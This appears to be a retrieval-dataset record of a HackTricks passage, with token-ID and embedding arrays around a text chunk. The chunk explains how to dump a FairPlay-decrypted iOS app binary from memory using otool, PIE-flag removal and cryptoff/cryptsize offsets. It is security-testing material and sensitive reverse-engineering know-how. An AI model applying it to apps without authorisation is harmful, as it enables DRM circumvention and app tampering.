[ 2036, 2039, 11066, 6764, 2000, 1996, 16380, 5080, 2007, 5371, 2039, 11066, 1026, 2334, 1035, 5371, 1035, 4130, 1028, 1012, 11381, 1998, 14817, 2075, 18726, 18150, 3436, 1996, 24531, 5371, 2013, 2019, 27178, 2050, 4353, 4957, 24979, 2075, 2458, 1010, 18726, 2024, 2823, 3024, 2000, 3231, 2545, 3081, 2058, 1011, 1996, 1011, 2250, 1006, 27178, 2050, 1007, 4353, 1012, 1999, 2008, 3663, 1010, 2017, 1005, 2222, 4374, 2019, 2009, 5244, 1011, 2578, 4957, 1010, 2107, 2004, 1996, 2206, 1024, 2009, 5244, 1011, 2578, 1024, 1013, 1013, 1029, 2895, 1027, 8816, 1011, 19676, 1004, 24471, 2140, 1027, 16770, 1024, 1013, 1013, 1055, 2509, 1011, 9706, 1011, 4643, 1011, 1015, 1012, 9733, 10376, 2015, 1012, 4012, 1013, 3231, 1011, 25423, 2102, 1013, 19676, 1012, 20228, 2923, 29337, 2064, 2224, 1996, 2009, 5244, 2578, 11412, 8816, 2121, 6994, 2000, 8816, 1996, 24531, 2013, 2019, 27178, 2050, 4353, 24471, 2140, 1012, 16500, 2009, 3081, 27937, 2213, 1024, 1002, 27937, 2213, 16500, 1011, 1043, 2009, 5244, 1011, 2578, 3736, 3726, 1996, 24531, 5371, 7246, 2007, 1996, 2206, 3094, 1024, 1001, 2009, 5244, 1011, 2578, 1011, 1057, 1000, 2009, 5244, 1011, 2578, 1024, 1013, 1013, 1029, 2895, 1027, 8816, 1011, 19676, 1004, 24471, 2140, 1027, 16770, 1024, 1013, 1013, 1055, 2509, 1011, 9706, 1011, 4643, 1011, 1015, 1012, 9733, 10376, 2015, 1012, 4012, 1013, 3231, 1011, 25423, 2102, 1013, 19676, 1012, 20228, 2923, 1000, 1011, 1051, 1011, 1028, 2041, 1012, 24531, 6305, 15549, 4892, 1996, 10439, 12441, 2487, 1012, 2013, 2019, 24531, 1024, 2065, 2017, 2031, 1996, 24531, 1006, 2763, 2164, 2019, 2525, 11703, 2854, 13876, 2098, 10439, 12441, 1007, 1010, 4895, 5831, 2361, 2009, 1998, 2017, 2024, 3201, 2000, 2175, 1012, 1996, 10439, 12441, 2003, 2284, 1999, 1996, 2364, 14012, 14176, 1006, 1012, 10439, 1007, 1010, 1041, 1012, 1043, 1012, 18093, 1013, 23921, 1060, 1012, 10439, 1013, 23921, 1060, 1012, 2156, 1996, 2206, 4942, 29015, 2005, 4751, 2006, 1996, 14676, 1997, 1996, 3200, 7201, 1012, 2006, 6097, 2891, 1005, 1055, 2424, 2121, 1010, 1012, 10439, 2472, 3111, 2024, 2441, 2011, 2157, 1011, 22042, 2068, 1998, 17739, 1000, 2265, 7427, 4180, 1000, 1012, 2006, 1996, 5536, 2017, 2064, 2074, 3729, 2046, 2068, 1012, 1016, 1012, 2013, 1037, 7173, 29162, 5080, 1024, 2065, 2017, 2123, 1005, 1056, 2031, 1996, 2434, 24531, 1010, 2059, 2017, 2342, 1037, 7173, 29162, 5080, 2073, 2017, 2097, 16500, 1996, 10439, 1006, 1041, 1012, 1043, 1012, 3081, 10439, 3573, 1007, 1012, 2320, 5361, 1010, 2017, 2342, 2000, 14817, 1996, 10439, 12441, 2013, 3638, 1998, 14591, 1996, 24531, 5371, 1012, 2138, 1997, 2852, 2213, 1010, 1996, 10439, 12441, 5371, 2003, 4372, 26775, 22571, 3064, 2043, 2009, 2003, 8250, 2006, 1996, 16380, 5080, 1010, 2061, 3432, 4815, 2009, 2013, 1996, 14012, 1006, 2593, 2083, 7020, 2232, 2030, 22224, 1007, 2097, 2025, 2022, 7182, 2000, 7901, 3992, 2009, 1006, 3191, 2279, 2930, 1007, 1012, 11703, 2854, 16790, 1006, 6410, 1007, 4406, 2019, 11924, 4646, 1010, 1996, 12441, 1997, 2019, 16380, 10439, 2064, 2069, 2022, 4487, 20939, 3366, 23931, 1998, 2025, 21933, 8737, 18450, 1012, 2043, 2019, 4646, 2003, 7864, 2000, 1996, 10439, 3573, 1010, 6207, 2034, 2310, 3089 ]
hack_tricks
436.txt
4
##fies the app conduct and before releasing it to the app - store, apple encrypts the binary using fairplay. so the binary download from the app store is encrypted complicating ting the reverse - engineering tasks. however, note that there are other third party software that can be used to obfuscate the resulting binaries. in order to run the encrypted binary, the device needs to decrypt it in memory. then, it's possible to dump the decrypted binary from the memory. first, check if the binary is compiled with the pie ( position independent code ) flag : otool - vh original _ app # check the last word of the last line of this codehome : mach header magic cputype cpusubtype caps filetype ncmds sizeofcmds flagsmh _ magic _ 64 x86 _ 64 all 0x00 execute 47 6080 noundefs dyldlink twolevel pieif it's set you can use the script change _ macho _ flags. py to remove it with python2 : python change _ mach _ o _ flags. py - - no - pie original _ appotool - vh hello _ worldhello _ world : mach header magic cputype cpusubtype caps filetype ncmds sizeofcmds flags mh _ magic arm v7 0x00 execute 22 2356 noundefs dyldlink twolevel mh _ no _ heap _ executionnow that the pie flag isn't set, the os will load the program at a fixed starting location every - time. in order to find this location you can use : otool - l original _ app | grep - a 3 lc _ segment | grep - a 1 _ _ text segname _ _ text vmaddr 0x00004000then, it's necessary to extract the the memory range that needs to be dumped : otool - l original _ app | grep - a 4 lc _ encryption _ info cmd lc _ encryption _ info cmdsize 20 cryptoff 16384 cryptsize 17416192 cryptid 0the value of cryptoff indicated the starting address of the encrypted content and the cryptsize indicates the size of the encrypted content. so, the start address to dump will be vmaddr + cryptoff and the end address will be the start address + cryptsize in this case
[ 0.5224465131759644, -0.37791669368743896, -0.38042089343070984, 0.3333105444908142, 0.19090378284454346, -0.3504078686237335, 0.3197156488895416, 0.3007456660270691, 0.048170652240514755, 0.7900213599205017, 0.03429354727268219, -0.13961674273014069, 0.23142820596694946, -1.0316882133483887, -0.5414546728134155, -0.45331546664237976, -0.5234987139701843, -0.08851604163646698, -0.31620219349861145, -0.032082974910736084, 0.5203772187232971, -0.3795000910758972, -0.5083563327789307, -0.6747422814369202, -0.8128153085708618, 0.649996280670166, 0.7768846750259399, -0.10330923646688461, 0.5254113078117371, 0.9891685247421265, 0.1677354872226715, 0.41558510065078735, -0.1614701747894287, -0.37653848528862, 0.7778353095054626, -0.19303080439567566, 1.1195144653320312, -0.2983492910861969, 0.018678592517971992, -0.8821877241134644, 0.22735877335071564, 0.23001527786254883, 0.3387889266014099, -0.37958914041519165, -0.6661912798881531, -0.7549408078193665, -0.5141602158546448, -0.29953664541244507, 0.609735906124115, -0.16198840737342834, -0.05679166316986084, 0.15619370341300964, -0.06733482331037521, 0.04615649953484535, 0.21093519032001495, 0.5107326507568359, -0.2716982662677765, -0.013147173449397087, -0.7516677379608154, 0.39956775307655334, 0.20750980079174042, 0.20957466959953308, 0.42045390605926514, -1.1149264574050903, 0.35556453466415405, 0.2965845465660095, -0.47681984305381775, -0.5964893102645874, -0.8121508955955505, -0.2512812614440918, -0.1042155921459198, 0.860737144947052, -0.6015974879264832, -0.5939584970474243, -0.7805551290512085, -0.33513060212135315, -0.2261217087507248, -0.24253953993320465, -0.9784286022186279, 1.1941337585449219, -0.37436020374298096, 0.6097300052642822, 0.4468410313129425, -0.38997882604599, -0.25412517786026, -0.5575546026229858, 0.818902313709259, -0.08729175478219986, -0.40845829248428345, -0.4405837953090668, -0.056114453822374344, 0.4800436496734619, -1.3180385828018188, 0.022139282897114754, 0.2183251976966858, 0.5239141583442688, -0.7638444900512695, -0.5103598237037659, 0.6823731064796448, -0.3199736475944519, 1.1976486444473267, 0.5917155742645264, 0.4078047573566437, 0.8123056292533875, -0.12009800225496292, 0.5468130707740784, 0.370411217212677, -0.22787676751613617, -0.40493205189704895, -0.21608306467533112, 0.5133191347122192, -0.11742362380027771, 0.1671130508184433, -0.8025542497634888, 0.015316164121031761, -0.24780790507793427, 0.8881264328956604, -0.32898440957069397, -0.17695683240890503, 0.16276700794696808, 0.6400148868560791, -0.2753470242023468, 0.545472264289856, 0.03156003728508949, 0.0591498464345932, 0.3802626132965088, 0.41691499948501587, 0.6860520243644714, -1.0429859161376953, -0.6388294696807861, -0.14108547568321228, -0.4078264832496643, 0.37276607751846313, 0.3590127229690552, -0.6454558968544006, 0.34041184186935425, 0.21219204366207123, 0.035528119653463364, 0.49424299597740173, -0.5426409244537354, 0.1488562375307083, -0.0316888689994812, -0.46006160974502563, 1.0683718919754028, 0.4031723439693451, -0.33001914620399475, -0.4324699342250824, 0.2553778290748596, 0.089271180331707, 0.9913201928138733, 0.005511659197509289, 0.8161087036132812, 0.5581661462783813, -0.3844355642795563, -0.3670313060283661, 0.5342556834220886, -0.8802845478057861, 0.7238096594810486, -0.3451247811317444, 0.034027233719825745, -0.31867191195487976, 0.7423779368400574, 0.09273353964090347, 0.5158113837242126, -0.2935931086540222, 0.7849792838096619, -0.8671035766601562, -0.7911137342453003, 0.11806488037109375, 0.49476075172424316, 0.34809380769729614, -0.07079767435789108, 0.3054289221763611, 0.2434837371110916, 1.3564553260803223, 0.7238703370094299, 0.7631474733352661, -0.3623042106628418, 0.5057260990142822, 0.003353666514158249, -0.40615296363830566, 0.08961594104766846, 0.41544148325920105, 1.0171523094177246, -0.6924332976341248, 0.3997024893760681, -0.03780079632997513, -0.2710205316543579, -0.3234230577945709, -0.09589579701423645, -0.5967727303504944, 0.435882031917572, -1.0989595651626587, 0.6076505184173584, 0.08774149417877197, -0.38322076201438904, -1.3852423429489136, -0.31148114800453186, -0.293150395154953, -1.390867829322815, -0.44765323400497437, -0.03365025296807289, 0.215810626745224, 0.16047675907611847, -1.0511568784713745, -0.1261732280254364, 0.6673855781555176, 0.42019200325012207, 0.04352547228336334, 0.350040078163147, 1.0568032264709473, -0.053112659603357315, -0.48737964034080505, -0.014445117674767971, -0.3201347887516022, 0.09285087138414383, 0.7493641376495361, 0.12516359984874725, 0.6442691683769226, -0.1942550092935562, -0.1578388214111328, 0.657372236251831, 0.45211198925971985, 0.5143991112709045, 0.003674989566206932, -0.1148485466837883, -0.13622067868709564, 0.3607501685619354, -0.50890052318573, 0.025597022846341133, 0.0701838806271553, 0.3490079939365387, 0.6325967311859131, 0.822711706161499, 0.16468343138694763, 0.2001943141222, 0.27387139201164246, -0.05729174613952637, -0.2275809794664383, -0.12006598711013794, 0.20872938632965088, 0.9215331077575684, 0.35250726342201233, -0.29403531551361084, 0.3862960934638977, -0.18598774075508118, 0.2160014659166336, 0.3171175420284271, 0.36778393387794495, 0.9175854325294495, -0.7299724221229553, 0.39130762219429016, 0.506614089012146, -0.1247011050581932, -0.6569992303848267, -0.3823840916156769, 1.0497113466262817, 0.6341870427131653, -0.5316101908683777, -0.43457427620887756, 0.45057621598243713, 0.059071820229291916, 0.33814921975135803, -0.3743884265422821, -0.31946861743927, 0.8108606934547424, -0.15741130709648132, 0.362373948097229, -0.2615044414997101, -0.2468855381011963, -0.27179449796676636, -0.5719188451766968, -1.0171772241592407, -0.5074721574783325, -0.8621524572372437, 0.25236576795578003, 0.2805579602718353, -0.5878260135650635, 0.5238170027732849, -0.9980273246765137, -0.17943179607391357, 0.4813803732395172, 0.4762468636035919, 0.4337296783924103, -0.14901387691497803, -0.23842230439186096, -0.9967306852340698, 0.2924959063529968, 0.03629063442349434, 0.9436925053596497, -0.43172115087509155, 0.3670743405818939, -0.013159306719899178, -0.5576928853988647, 0.025444427505135536, -0.8051522970199585, 0.6372397541999817, 0.1398683488368988, 0.027516772970557213, 0.15692132711410522, 0.16290612518787384, 0.6267585158348083, 0.6440832018852234, 0.25256606936454773, -0.5780683755874634, 0.6794593334197998, 0.4282892346382141, -0.651624858379364, 0.23123565316200256, 0.12784238159656525, -0.6139188408851624, 0.4008793532848358, 0.37919679284095764, 0.694060742855072, -0.4882194399833679, 0.5346211194992065, 0.8431186676025391, 0.2900323271751404, -0.022414151579141617, -0.204328253865242, 0.6159167885780334, -0.5138877630233765, -0.7163170576095581, -0.07484155893325806, -0.3843865692615509, 0.14700092375278473, -0.007015183102339506, -0.6648606061935425, 0.2769116759300232, -0.5518015027046204, -0.18058818578720093, -0.15533429384231567, 0.21271996200084686, 1.2870274782180786, -0.34316015243530273, -0.012684594839811325, 0.26897117495536804, 0.1652909815311432, 0.6529470086097717, 0.7223960757255554, 0.16694118082523346, -0.3077307641506195, 0.1994052678346634, 0.06900981068611145, -0.0830477848649025, 0.382246732711792, 0.22004662454128265, 0.1452975571155548, -0.511297345161438, -0.6993305087089539, -0.2784917950630188, -0.38733139634132385, 0.40319597721099854, -0.14681299030780792, 0.875525951385498, 0.4661340117454529, -0.697754442691803, 0.06546967476606369, 0.4592898488044739, 0.24184702336788177, -0.05121039226651192, -0.4748987555503845, 0.7367206811904907, 0.44759997725486755, -0.5781734585762024, -0.4559026062488556, -0.3203580677509308, 0.6964319944381714, 0.20875093340873718, 0.18012599647045135, 0.26644960045814514, -0.1967921108007431, -0.18120190501213074, 0.8828094601631165, -0.3789224326610565, -0.943081259727478, 0.605522096157074, -0.1155196949839592, 0.293000727891922, -0.49461448192596436, 0.03603091463446617, -0.7692908048629761, -0.2842523455619812, 0.16384418308734894, 1.0897939205169678, -0.2658868730068207, -0.7001174688339233, -0.6628598570823669, -0.13351012766361237, -0.4134865999221802, -0.10894035547971725, -0.17820262908935547, 0.07417165488004684, -0.22494108974933624, -1.0594202280044556, -0.7246931791305542, 0.4747730791568756, 0.606419563293457, 0.7365980744361877, 0.35525253415107727, 0.9663437008857727, 0.5648910999298096, -0.5736149549484253, 0.335450679063797, -0.5878627300262451, 0.5210181474685669, -0.11437610536813736, 0.6880881190299988, -0.23491498827934265, 0.05749785155057907, -0.33773311972618103, -0.39724594354629517, -0.7407451868057251, 0.05277872830629349, 0.045998211950063705, -0.03497432544827461, -0.9448337554931641, 0.12237244844436646, -0.6039795875549316, 0.24676817655563354, -0.8779480457305908, -0.6445483565330505, -0.4741210341453552, 0.3357671797275543, 0.8999720811843872, -0.4381071627140045, 0.07168615609407425, -0.6911827921867371, -0.07395336776971817, 0.05295957997441292, 0.14511068165302277, -0.7782559394836426, -0.3649676442146301, -0.58342444896698, -1.3136636018753052, 0.3041246831417084, 0.4888773262500763, 0.3113991618156433, 0.5947141647338867, -0.9606407284736633, -0.38017842173576355, 0.9967730641365051, -0.7667139172554016, -0.7136700749397278, 0.23421981930732727, 0.49029451608657837, 0.4903411865234375, 0.6520907282829285, -0.2164463996887207, 0.21579928696155548, -0.10929141938686371, -0.4640940725803375, 0.7103667259216309, -0.7105922698974609, 0.0016834585694596171, 0.20133447647094727, 0.15177680552005768, -0.27743127942085266, 0.15643256902694702, -0.09955142438411713, 0.04336593672633171, 0.2082783430814743, 0.22254371643066406, -0.2165154367685318, -0.6321313977241516, 0.2706149220466614, -0.09046680480241776, -0.4355267584323883, 0.19788219034671783, 0.5512772798538208, -0.35357433557510376, 0.3790281116962433, -0.5991283059120178, -0.4464568793773651, 0.8145365118980408, -0.23331813514232635, 1.099130392074585, -0.003291848348453641, 0.06895983219146729, -0.11328146606683731, -0.25218915939331055, 0.7785767912864685, -0.08231089264154434, 0.4690757989883423, -1.6697858572006226, -0.8642281293869019, -0.2970086336135864, -0.15653526782989502, 0.4657895863056183, 0.7317042946815491, 0.3382086455821991, 0.18305359780788422, -0.1749759316444397, -0.24969559907913208, -0.6259462237358093, -0.610036313533783, -0.5423625111579895, -0.43749502301216125, 0.6550324559211731, 0.2140391319990158, 0.39657437801361084, -0.36261409521102905, -0.5159918069839478, 0.7079570293426514, -0.06968595087528229, -0.31541550159454346, -0.5452575087547302, -0.2964189648628235, 0.15567436814308167, 0.1811424344778061, -0.021855389699339867, 0.4765516221523285, -0.17886614799499512, -0.14554792642593384, 0.6284213066101074, 0.10610104352235794, 0.3151482343673706, 0.2157067358493805, -0.7663136124610901, 0.357960045337677, 0.459760844707489, -0.2773953080177307, 0.05763727053999901, -0.03221813961863518, -0.06645133346319199, -0.12889932096004486, -1.0424933433532715, -0.5001373291015625, -0.6101640462875366, -0.6611631512641907, 0.6212087869644165, -0.6710003614425659, 0.06035997346043587, -0.4260466694831848, -0.6769837737083435, -0.5144912600517273, 0.7836668491363525, 0.09491123259067535, -1.1120214462280273, 0.0151218231767416, -0.13707944750785828, 0.01876932941377163, 0.012560656294226646, 0.21455751359462738, -0.6531335711479187, -0.43162280321121216, 0.04476272687315941, 0.6354693174362183, 0.34442847967147827, -0.5883642435073853, 0.0638347938656807, 0.4530012607574463, 0.46694856882095337, 0.5042641758918762, -0.6602522134780884, -0.20549297332763672, -0.7701209783554077, 0.12039090692996979, -0.6174905300140381, 0.661666750907898, -0.5618197917938232, 0.32609978318214417, -0.06009872257709503, 0.09435684233903885, 0.18822816014289856, -0.26267147064208984, 0.10764780640602112, 0.7286245822906494, 0.931556761264801, -0.6396756172180176, 0.1277538388967514, -0.2447596788406372, 0.5367193818092346, 0.5318138003349304, -0.254518985748291, -0.870887041091919, 0.6156847476959229, 0.06793780624866486, -1.3045425415039062, 0.5838005542755127, 0.4560832381248474, -0.2412179857492447, -0.29661116003990173, -0.40091672539711, 0.36865195631980896, -0.09019434452056885, 0.204037144780159, 0.764127254486084, 0.34313535690307617, -0.08534527570009232, -0.9234848618507385, 0.2512773871421814, 0.36827582120895386, -0.35943058133125305, -0.005532708019018173, -0.40462616086006165, 0.14712876081466675, 0.12045630812644958, 0.06881235539913177, 0.21812401711940765, -0.7759793996810913, -0.40090417861938477, -0.032848890870809555, -0.08493629842996597, 0.6476120352745056, -0.3084844648838043, -0.6796795725822449, 0.031261030584573746, 0.167565256357193, -0.25119781494140625, 0.40827468037605286, 0.3748161196708679, 0.4671938121318817, 0.2975462079048157, -0.07387952506542206, 0.4555692672729492, 0.10119681805372238, -0.045242853462696075, 0.5206586718559265, -0.18203599750995636, -0.7245773077011108, 1.1859772205352783, -0.19797134399414062, -1.0714389085769653, -0.41202887892723083, 0.24577312171459198, 0.031619518995285034, 0.4911886751651764, -0.3842492997646332, -0.2618764340877533, 0.6330265998840332, -0.050316039472818375, 0.3885229825973511, 0.3327508568763733, -0.10114223510026932, 0.1912136673927307, -0.7311404943466187, 0.7942134737968445, -0.13911929726600647, -0.11391695588827133, 0.5237748622894287, -0.6729716062545776, -0.6160256266593933, -1.0027340650558472, -0.057069920003414154, -0.1821202039718628, -0.1467241495847702, 1.0520097017288208, -0.451708048582077, 0.22691667079925537, 0.3329608142375946, -0.14296230673789978, 0.6819116473197937, 0.12839987874031067, 0.7103212475776672, 0.5687417984008789, 0.27401918172836304, -0.7561076283454895, -0.4044080674648285, 0.026463201269507408, -0.0950077474117279, 0.21186283230781555, -0.5010428428649902, -0.3748614490032196, -0.4089186489582062, -0.20103074610233307, -0.4149380922317505, -0.6993331909179688, -0.42514917254447937, -0.40403732657432556, -0.2009907066822052, 0.40042975544929504, -0.7376607656478882, -0.29453033208847046, -0.43952488899230957, 0.42579472064971924, -0.4253849685192108, 0.10176139324903488, 0.1899828016757965, -0.23284117877483368, 0.319017231464386, -1.0700616836547852, 0.6681435704231262, -0.29340022802352905, -0.7194058299064636, -0.3765546381473541, -0.6837887763977051, -0.09581268578767776, -0.6915439367294312, -0.46721237897872925, 0.10774018615484238, -0.49994051456451416, 0.8778344392776489, -0.8502376675605774, -0.11051733791828156, -0.5523253679275513, -0.44456765055656433, 0.467415452003479, 0.8223822712898254, -1.1772664785385132, 0.4181603789329529, -0.06160373240709305, 0.4971587657928467, 0.23754502832889557, -0.577892005443573, -0.07008115947246552, 0.1209845021367073, 0.05045668035745621, 0.1407146453857422, 0.33466246724128723, -0.09348665177822113, 0.6349636912345886, 0.24843047559261322, -0.0996912345290184, 0.1901085078716278, -0.8484500050544739, -0.5351804494857788, 0.5634908676147461, -0.12177335470914841, -0.45358577370643616, 0.4015699028968811, 0.6362572908401489, 0.6335073113441467, -0.8284544348716736, -0.03563081473112106, 0.35857483744621277, 0.5704459547996521, 0.023732731118798256, 0.025456883013248444, 0.21085941791534424, 0.14165063202381134, 0.04527430236339569, -0.16039791703224182, -0.5461350083351135, 0.5814122557640076, 0.01244218647480011, -0.0024217008613049984, -0.11713011562824249, -0.739046037197113, 0.1729268878698349, 0.25941964983940125, 0.21664266288280487, 0.2514601945877075, 0.03305220976471901, 0.3948650658130646, -0.7474573254585266, 0.3333149552345276, -0.5182273983955383, -0.545132040977478, 0.31544730067253113, -0.08009675145149231, -0.18046066164970398, 0.2831490933895111, 0.008477811701595783, 0.05155925452709198, 0.3241509199142456, 0.1947503685951233, 0.7122319340705872, -0.060445308685302734, 0.4583180248737335, 1.2028602361679077, 0.00010167428990826011, -0.4550676643848419, -0.46251922845840454, -0.00413910485804081, -0.7041622400283813, -0.7661296725273132, -0.3158734142780304, 1.0303075313568115, 0.7456005215644836, 0.05408555641770363, -0.20831729471683502, -0.2938591539859772, 0.5372172594070435, 0.25112539529800415, 0.41138625144958496, 0.005681899841874838, -1.1007628440856934, 0.5957065224647522, -0.5197364091873169, 0.11449692398309708, 0.3347816467285156, -0.058820441365242004, 0.3179034888744354, -0.0493745431303978, -0.5221540927886963, 0.3136483430862427, -0.21726523339748383, 0.04107210040092468, 0.44266805052757263, 0.16396525502204895, 0.9385201334953308, -0.4606272876262665, 0.37552669644355774, -0.5090779662132263, 0.39069005846977234, 0.566702127456665, 0.0944761335849762, -0.31368279457092285, 0.2645540237426758, 0.5279499888420105, -0.9573532342910767, 0.03984732925891876, 0.4032110571861267, -0.015303021296858788, -0.40059393644332886, 0.40075695514678955, -0.22410798072814941, -0.8216744065284729, -0.013586663641035557, -0.3199608325958252, 0.19096609950065613, -0.16000227630138397, 0.11741273105144501, -0.08055058121681213, -0.1889328807592392, 0.6336870789527893, -0.8704593777656555, 0.9806227684020996, -0.2504785358905792, 0.04825664684176445, 0.45068058371543884, 0.34064239263534546, -1.5104600191116333, 0.6861268877983093, 0.5370287895202637, 0.5823675990104675, 0.012022143229842186, 1.0302119255065918, -0.11437294632196426, -0.15940172970294952, -0.15733976662158966, 0.14120762050151825, -1.4063202142715454, 0.09161409735679626, 0.5332420468330383, -0.3072059154510498, -0.778278112411499, 0.03285911679267883, 0.4966966509819031, -1.0149284601211548, 0.303464412689209, -0.2252810150384903, 0.4900861978530884, -0.7899441123008728, 0.350271075963974, -0.2130052149295807, 0.48239418864250183, 0.11586429923772812, -0.6155653595924377, -0.7431254982948303, 1.1711945533752441, -0.013773147948086262, 0.22505424916744232, -0.16099563241004944, 0.388670414686203, 0.24330036342144012, 0.5804535150527954, 0.6859477758407593, -0.29827162623405457, -0.09389632940292358, 0.1794167160987854, -0.08880845457315445, 0.045526549220085144, 0.09580662101507187, -0.011043216101825237, 0.6827871799468994, 0.02590562403202057, -0.7084929347038269, -0.521132230758667, 0.12587739527225494, -0.06073438376188278, -1.1527036428451538, 0.19857151806354523, -0.3977162539958954, -0.21833954751491547, -0.015071673318743706, 0.3042019307613373, 0.15665628015995026, 0.6553982496261597, -1.011569857597351, -0.3706449866294861, -0.47313904762268066, -0.042316727340221405, -0.3914779722690582, 0.9539145827293396, -1.094288945198059, -0.16000109910964966, 0.4059281051158905, -0.6131687760353088, -0.5190478563308716, -0.15284550189971924, -0.6947787404060364, -0.3088815212249756, 0.05185316503047943, -0.16483895480632782, 0.9030227065086365, 0.6915939450263977, -0.0673135444521904, -0.023056138306856155, 0.13154911994934082, 0.8133962750434875, -0.3785277009010315, 0.576173722743988, 0.25029781460762024, 0.13886499404907227, 0.3819892704486847, -0.37854617834091187, 0.8890623450279236, -0.6310737133026123, 0.010294375941157341, -0.19522643089294434, -0.2304762452840805, -1.2596147060394287, -0.5173313617706299, -0.2585933208465576, 0.033820413053035736, -0.026267338544130325, -0.062283314764499664, -0.564709484577179, 0.13039030134677887, -0.539359450340271, -0.016354495659470558, -0.04934938997030258, -0.38148757815361023, 0.190246120095253, 0.2773650884628296, -0.36902815103530884, -1.5765255689620972, 4.236939907073975, 0.40879151225090027, -0.12702858448028564, 1.218814492225647, 0.4805910587310791, 0.4030831456184387, 0.876005232334137, -1.3718758821487427, -0.3811083137989044, -0.09435945004224777, -0.19807212054729462, -0.4340023100376129, 0.9140259027481079, 0.0891467034816742, 0.08263172954320908, 0.10653898864984512, -0.4196259677410126, 0.07525016367435455, 0.7503537535667419, -0.5417408347129822, -0.764967679977417, 0.13312913477420807, -0.13806693255901337, 0.763213574886322, 0.2100728303194046, 0.3775351345539093, 0.46980926394462585, -0.49707454442977905, -0.03223661705851555, 0.10429849475622177, -0.3438461720943451, -0.37901604175567627, 0.06994679570198059, -0.28873932361602783, -0.1897614598274231, 0.7071913480758667, 0.6852825284004211, -0.8564401865005493, -0.339572012424469, 0.2407255470752716, 0.05602933466434479, -0.17528174817562103, 0.7527391910552979, -0.1378748118877411, -0.0073160636238753796, 0.5849405527114868, -0.6192107200622559, 0.16699841618537903, 0.5756272077560425, -0.34685173630714417, 0.6187139749526978, -0.15309984982013702, 0.29887712001800537, -0.23661081492900848, 0.13097302615642548, 0.31527137756347656, -0.004211847670376301, -0.6091887354850769, -0.09154671430587769, 0.18852567672729492, 0.7269449234008789, -0.41426700353622437, -0.6818271279335022, -0.33815714716911316, -1.1421681642532349, -0.45402953028678894, -0.42024531960487366, 0.6879370212554932, 0.18354324996471405, 0.0821886956691742, -0.46268394589424133, -0.01876683533191681, -0.9267380833625793, -0.13871358335018158, 0.35197365283966064, -0.14041230082511902, 0.016148166730999947, 0.5320205688476562, 0.4463421106338501, -0.7179545164108276, -0.01869952492415905, -0.39919063448905945, -0.4075360894203186, 0.23354917764663696, 0.8157578706741333, 0.5093340873718262, 0.18545633554458618, -0.5115543007850647, 0.2960836589336395, 0.210023432970047, 0.39787980914115906, -0.009050813503563404, 0.008002927526831627, -0.1833648532629013, 0.5611268877983093 ]
[ 14213, 1996, 10439, 6204, 1998, 2077, 8287, 2009, 2000, 1996, 10439, 1011, 3573, 1010, 6207, 4372, 26775, 22571, 3215, 1996, 12441, 2478, 4189, 13068, 1012, 2061, 1996, 12441, 8816, 2013, 1996, 10439, 3573, 2003, 4372, 26775, 22571, 3064, 4012, 24759, 5555, 3436, 28642, 1996, 7901, 1011, 3330, 8518, 1012, 2174, 1010, 3602, 2008, 2045, 2024, 2060, 2353, 2283, 4007, 2008, 2064, 2022, 2109, 2000, 27885, 25608, 16280, 1996, 4525, 8026, 12086, 1012, 1999, 2344, 2000, 2448, 1996, 4372, 26775, 22571, 3064, 12441, 1010, 1996, 5080, 3791, 2000, 11703, 2854, 13876, 2009, 1999, 3638, 1012, 2059, 1010, 2009, 1005, 1055, 2825, 2000, 15653, 1996, 11703, 2854, 13876, 2098, 12441, 2013, 1996, 3638, 1012, 2034, 1010, 4638, 2065, 1996, 12441, 2003, 9227, 2007, 1996, 11345, 1006, 2597, 2981, 3642, 1007, 5210, 1024, 27178, 13669, 1011, 1058, 2232, 2434, 1035, 10439, 1001, 4638, 1996, 2197, 2773, 1997, 1996, 2197, 2240, 1997, 2023, 3642, 23393, 2063, 1024, 24532, 20346, 3894, 17368, 13874, 17368, 6342, 19279, 18863, 9700, 5371, 13874, 13316, 26876, 2015, 2946, 11253, 27487, 5104, 9245, 2213, 2232, 1035, 3894, 1035, 4185, 1060, 20842, 1035, 4185, 2035, 1014, 2595, 8889, 15389, 4700, 3438, 17914, 15156, 3207, 10343, 1040, 8516, 19422, 19839, 2048, 20414, 2884, 11345, 10128, 2009, 1005, 1055, 2275, 2017, 2064, 2224, 1996, 5896, 2689, 1035, 24532, 2080, 1035, 9245, 1012, 1052, 2100, 2000, 6366, 2009, 2007, 18750, 2475, 1024, 18750, 2689, 1035, 24532, 1035, 1051, 1035, 9245, 1012, 1052, 2100, 1011, 1011, 2053, 1011, 11345, 2434, 1035, 10439, 11439, 4747, 1011, 1058, 2232, 7592, 1035, 2088, 18223, 2080, 1035, 2088, 1024, 24532, 20346, 3894, 17368, 13874, 17368, 6342, 19279, 18863, 9700, 5371, 13874, 13316, 26876, 2015, 2946, 11253, 27487, 5104, 9245, 1049, 2232, 1035, 3894, 2849, 1058, 2581, 1014, 2595, 8889, 15389, 2570, 17825, 2575, 15156, 3207, 10343, 1040, 8516, 19422, 19839, 2048, 20414, 2884, 1049, 2232, 1035, 2053, 1035, 16721, 1035, 7781, 19779, 2008, 1996, 11345, 5210, 3475, 1005, 1056, 2275, 1010, 1996, 9808, 2097, 7170, 1996, 2565, 2012, 1037, 4964, 3225, 3295, 2296, 1011, 2051, 1012, 1999, 2344, 2000, 2424, 2023, 3295, 2017, 2064, 2224, 1024, 27178, 13669, 1011, 1048, 2434, 1035, 10439, 1064, 24665, 13699, 1011, 1037, 1017, 29215, 1035, 6903, 1064, 24665, 13699, 1011, 1037, 1015, 1035, 1035, 3793, 7367, 16989, 4168, 1035, 1035, 3793, 1058, 25666, 13626, 1014, 2595, 8889, 8889, 29537, 2692, 10760, 2078, 1010, 2009, 1005, 1055, 4072, 2000, 14817, 1996, 1996, 3638, 2846, 2008, 3791, 2000, 2022, 14019, 1024, 27178, 13669, 1011, 1048, 2434, 1035, 10439, 1064, 24665, 13699, 1011, 1037, 1018, 29215, 1035, 21999, 1035, 18558, 4642, 2094, 29215, 1035, 21999, 1035, 18558, 4642, 5104, 4697, 2322, 19888, 7245, 27497, 2549, 19888, 5332, 4371, 25280, 2575, 16147, 2475, 19888, 3593, 1014, 10760, 3643, 1997, 19888, 7245, 5393, 1996, 3225, 4769, 1997, 1996, 4372, 26775, 22571, 3064, 4180, 1998, 1996, 19888, 5332, 4371, 7127, 1996, 2946, 1997, 1996, 4372, 26775, 22571, 3064, 4180, 1012, 2061, 1010, 1996, 2707, 4769, 2000, 15653, 2097, 2022, 1058, 25666, 13626, 1009, 19888, 7245, 1998, 1996, 2203, 4769, 2097, 2022, 1996, 2707, 4769, 1009, 19888, 5332, 4371, 1999, 2023, 2553 ]
hack_tricks
